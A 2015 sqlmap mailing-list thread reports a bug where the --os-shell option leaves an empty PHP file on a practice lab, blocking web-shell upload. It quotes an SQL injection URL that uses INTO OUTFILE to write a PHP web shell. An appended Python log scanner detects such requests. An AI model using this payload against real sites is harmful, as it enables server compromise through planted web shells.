Re: [sqlmap-users] SQLmap --os-shell BUG
From: Danux <da...@gm...> - 2015-07-04 22:41:40
Thanks

sqlmap --version
sqlmap/1.0-dev

In the meantime I will patch procs/mysql/write_file_limit.sql

On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <mir...@gm...> wrote:

> Which revision/version of sqlmap do you use? There has been a related
> patch a month ago. Will check tomorrow.
>
> Bye
>
> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:
>
>> Hello list, there is an issue with sqlmap when using the --os-shell
>> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>>
>> Description:
>>
>> A specific PAYLOAD (see below) used to upload a web shell will create an
>> empty file, e.g. tmpbezff.php. This will cause every subsequent PAYLOAD
>> attempt to fail with an "already exist" error, and it is therefore not
>> able to upload the web shell.
>>
>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%[...]--+
>>
>> By default, MySQL will throw an error if the file already exists:
>>
>> mysql> select 'ss' into outfile
>> '/var/www/OwaspPractice/upload/tmpbezff.php';
>> ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php'
>> already exists
>>
>> Solution:
>>
>> 1. Change the web shell name for every new PAYLOAD attempt, at least when
>> using the --os-shell option
>> 2. Fix the PAYLOAD causing problems.
>>
>> --
>> DanUx
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
DanUx
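Added example (not part of the original thread and not sqlmap code): a Python check a defender could run over web server access logs to flag requests like the one quoted above, whose URL-decoded query string contains INTO OUTFILE or INTO DUMPFILE. The log lines, the web_root default and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Matches INTO OUTFILE '<path>' / INTO DUMPFILE '<path>' in a decoded query string.
OUTFILE_RE = re.compile(
    r"\bINTO\s+(OUTFILE|DUMPFILE)\s+(['\"])(?P<path>.+?)\2", re.IGNORECASE)
SCRIPT_EXT = (".php", ".phtml", ".jsp", ".asp", ".aspx")
# Request field of a combined-format access log line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PUT) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (addresses, timestamps and sizes are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Jul/2015:22:30:01 +0000] "GET /injection/lessons/lesson03/index.php'
    '?code=NTGRWNR HTTP/1.1" 200 512',
    '192.0.2.10 - - [04/Jul/2015:22:30:05 +0000] "GET /injection/lessons/lesson03/index.php'
    '?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27--+ HTTP/1.1" 200 0',
    '192.0.2.10 - - [04/Jul/2015:22:31:12 +0000] "GET /index.php'
    '?code=x%2520INTO%2520OUTFILE%2520%2527/tmp/out.txt%2527 HTTP/1.1" 200 0',
]

def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded payloads are normalised too."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_outfile_writes(log_lines, web_root="/var/www/"):
    """Return one finding per request whose query string asks MySQL to write a file."""
    findings = []
    for lineno, line in enumerate(log_lines, 1):
        req = REQUEST_RE.search(line)
        if not req:
            continue
        query = decode_fully(urlsplit(req.group("target")).query)
        m = OUTFILE_RE.search(query)
        if not m:
            continue
        path = m.group("path")
        findings.append({"line": lineno, "path": path,
                         "in_web_root": path.startswith(web_root),
                         "script": path.lower().endswith(SCRIPT_EXT)})
    return findings

if __name__ == "__main__":
    for finding in find_outfile_writes(SAMPLE_LOG):
        print(finding)
```

A finding with both in_web_root and script set is the pattern described in the report. On the database side, the write itself can be blocked by not granting the FILE privilege to the application account and by restricting MySQL's secure_file_priv.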